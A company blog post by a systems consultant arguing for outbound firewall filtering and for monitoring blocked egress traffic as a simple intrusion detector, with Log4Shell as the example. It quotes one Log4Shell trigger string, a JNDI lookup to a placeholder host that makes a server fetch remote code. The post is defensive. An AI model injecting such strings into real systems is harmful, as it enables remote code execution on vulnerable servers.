The most common firewall setups reject inbound traffic initiated from the internet as such, but let all traffic pass through as long as the connection was initiated from the intranet. I strongly believe that such firewalls are overrated and that it makes as much sense (maybe even more sense) to filter outbound traffic.

The Log4Shell case

Yesterday some of us got quite busy with patching things and searching for vulnerable software due to the Log4Shell 0-day exploit. This one was quite nasty - this is the most common logging library in Java, and it would execute arbitrary code from the internet whenever strings like {{jndi:ldap://{}/exploit.class}} would be logged. Many servers log things like the URL, referrer URL and the UserAgent sent from the client, this means anyone with a bit of technical insight easily can run arbitrary code on many of the affected servers. A race ensued between system administrators making workarounds and patches, and malicious parties scanning the internet for easily exploitable servers and gaining a foothold on them.

How firewalls may help

A regular ingress firewall may help a company-internal server from being directly exploited by random people on the internet, but it will neither help the public servers from being exploited nor backend servers from being indirectly exploited (by traffic passed on from the internet through frontends). However, if the application can’t access the malicious code at, the attack above will fail. With such a firewall in place, a scanned host simply won’t show up on the list of vulnerable servers. I think it’s a good security policy to block all except whitelisted outgoing traffic.

This one may be an exception though - with most remote code exploits, the payload will typically be sent with the request itself. An egress firewall can’t help against that - but in practice often a minial exploit code is sent in the request itself, and when executed it will try to download some and execute it. In such cases the egress firewall will not really protect against the vulnerability being found nor exploited, but it will make it less likely that the computer is attacked by some arbitrary attacker. This may be just what’s needed to win the race and be able to patch up the 0-day exploit before the server is seriously compromised (ideally one should take down the server as soon as the vulnerability is known and take it up only when the vulnerability has been patched - but for quite some of our customers “uptime” is just too important).

I think that a firewall should never be regarded as more than “defence in depth”. Whatever services you have, they should be secure enough in themselves to survive being exposed to the open Internet. One should never assume that a client or a server is to be trusted just based on the IP-address of said client or server. In my opinion the primary purpose of a firewall is to reduce the risk of compromisation either due to 0-day exploit or due to some yet unknown exploit.

A poor man’s IDS

By not only rejecting unknown outbound traffic, but also having strong monitoring in place on all the blocked outbound traffic, one will already have a very simple IDS in place. This can be done relatively easy on the outbound traffic, for a well-managed server there should be no outbound traffic at all blocked by the firewall, so the noise level should be low. (One cannot monitor the inbound firewall in the same way, any computer connected to the internet will be bombarded by intrusion attempts, the logs are littered with noise). Such an “poor man’s IDS” is of course not perfect - a sofisticated and dedicated attacker aware of the firewall policies will probably manage to compromise the server without getting trapped by the firewall monitoring - but then again, no IDS is perfect.

Difficulties with egress firewall

Maintaining an outbound firewall is admittedly a lot harder than maintaining an inbound firewall. Developers will often expect that external resources are easily available and deliver applications that simply won’t work when having an egress firewall in place. The external resources are often hosted on the cloud and may have an everchanging jungle of IP-addresses pointing towards the service. One workaround may be to set up a proxy server on a dedicated VM with wide open egress firewall (actually, maybe a dedicated VM isn’t needed - iptables supports rules based on uid/pid). I think it’s worth the extra cost.

My conclusion

I don’t consider a firewall to be a silver bullet against anything, but I would still encourage you to filter away all unknown outbound traffic and monitor the traffic being blocked by the outbound firewall.

Tobias Brox

Senior Systems Consultant at Redpill Linpro

Tobias started working as a developer when he finished his degree at The University of Tromsø. He joined Redpill Linpro as a system administrator 5 years ago, and have embraced working with our customers, and maintaining/improving our internal tools.

Shell alias evolution

I work with Linux. That shouldn’t come as a surprise considering where I work. My private system does not differ that much either. Since I also work with automation my private systems are naturally configured automatically as well. I honestly cannot help it.

Bash aliases are a minor part of my configuration deployment and I tend to follow multiple approaches for handling my aliases in my environment.

This post is about my approach on handling the main part of ... [continue reading]

Zimbra and Outlook

Published on October 26, 2021